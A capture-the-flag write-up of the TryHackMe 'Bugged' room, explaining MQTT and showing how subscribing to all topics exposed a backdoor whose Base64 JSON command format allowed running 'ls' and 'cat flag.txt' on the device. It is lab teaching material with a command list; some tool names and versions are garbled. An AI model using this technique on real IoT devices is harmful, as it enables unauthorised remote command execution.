We covered working with internet of things devices, went over the MQTT protocol, demonstrated the publisher/subscriber model and performed RCE. This was part of TryHackMe Bugged
John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?
Understanding the Setup
I explained that John’s smart home appliance is likely communicating with his smartphone or computer. This communication happens over the internet, meaning the appliance is connected to John’s home Wi-Fi and is running a server to send and receive data (metrics like temperature or movement). My goal was to identify the port the smart appliance’s server was running on.
Discovering the Protocol and Architecture
Using an Nmap scan, I found that port 1883 (TCP) was open and running Mosquito version 2014, which uses the MQTT protocol. I described MQTT as a lightweight, machine-to-machine protocol common in IoT devices, designed for resource-constrained networks.
I detailed the MQTT architecture:
- Publisher: Sends data (e.g., the smart home appliance sending sensor metrics).
- Subscriber: Receives data (e.g., John’s smartphone or computer).
- MQTT Broker: A server that facilitates the message exchange between publishers and subscribers. Both publisher and subscriber are considered clients.
- Topics: The parameters or metrics being monitored (e.g., “lights,” “camera,” “temperature”). Subscribers subscribe to these topics to receive relevant messages.
Investigating the “Weird Traffic”
The “weird traffic” referred to messages and topics exchanged between the appliance (publisher) and John’s device (subscriber) via the MQTT broker. To uncover these messages, I needed to simulate both the publisher and subscriber roles. The MQTT broker software used in this scenario was mosquito_sub
.
Using Mosquito Client
I demonstrated how to use the mosquito_sub
client program. Key options included:
-h
or--host
: Specifies the MQTT host (the IP address of the smart appliance).-t
: Specifies the MQTT topic to subscribe to.
To get a list of all topics, I used the pound character (#
) as a wildcard for the topic. Among the listed topics, one appeared to be Base64 encoded. I decoded this Base64 string using CyberChef, revealing a JSON structure with an ID, a “registered_commands” array (help, CMD, sys), a publisher topic (pub_topic
), and a subscriber topic (sub_topic
).
Simulating Communication and Executing Commands
My next step was to simulate the publisher sending the discovered Base64 topic and the subscriber listening to the corresponding subscriber topic. Initially, I made a mistake by using mosquito_sub
for both publishing and subscribing. The correct approach was to use mosquito_pub
for publishing.
When I sent a test message, the response was another Base64 string indicating an “invalid message format” and providing the correct format: {"id": "BACK.ID", "CMD": "COMMAND", "ARG": "ARGUMENT"}
.
To execute commands, I needed to:
- Use the ID from the decoded weird topic.
- Set “CMD” to “CMD” (from the allowed registered commands).
- Set “ARG” to the system command I wanted to run (e.g.,
ls
). - Encode this entire JSON payload into Base64.
- Publish this Base64 encoded message using
mosquito_pub
with the-m
flag for the message, whilemosquito_sub
was listening to the subscriber topic.
The response to the ls
command was another Base64 string, which, when decoded, showed the file listing, including a flag file. I then repeated the process, changing the argument to cat flag.txt
to retrieve the flag’s content.
Conclusion
I concluded that this was a good learning experience and a starting point for IoT penetration testing. Understanding the MQTT protocol, the publisher/subscriber architecture, and the role of the broker is crucial. By identifying allowed commands within the topic structure, I was able to execute system commands on the IoT device.
Technical Commands Used on the Terminal
- Display help for mosquito_sub:Bash
mosquito_sub --help
- Subscribe to all topics from the host:Bash
mosquito_sub -t "#" -h [IP_ADDRESS]
- Publish a test message to the publisher topic (corrected usage with
mosquito_pub
):Bashmosquito_pub -t "[BASE64_ENCODED_PUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -h [IP_ADDRESS] -m "test"
- Publish the crafted Base64 command payload to the publisher topic:Bash
mosquito_pub -t "[BASE64_ENCODED_PUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -h [IP_ADDRESS] -m "[BASE64_ENCODED_COMMAND_PAYLOAD]"
This was done twice:- First with the
ls
command payload. - Second with the
get flag.txt
(conceptuallycat flag.txt
) command payload.
- First with the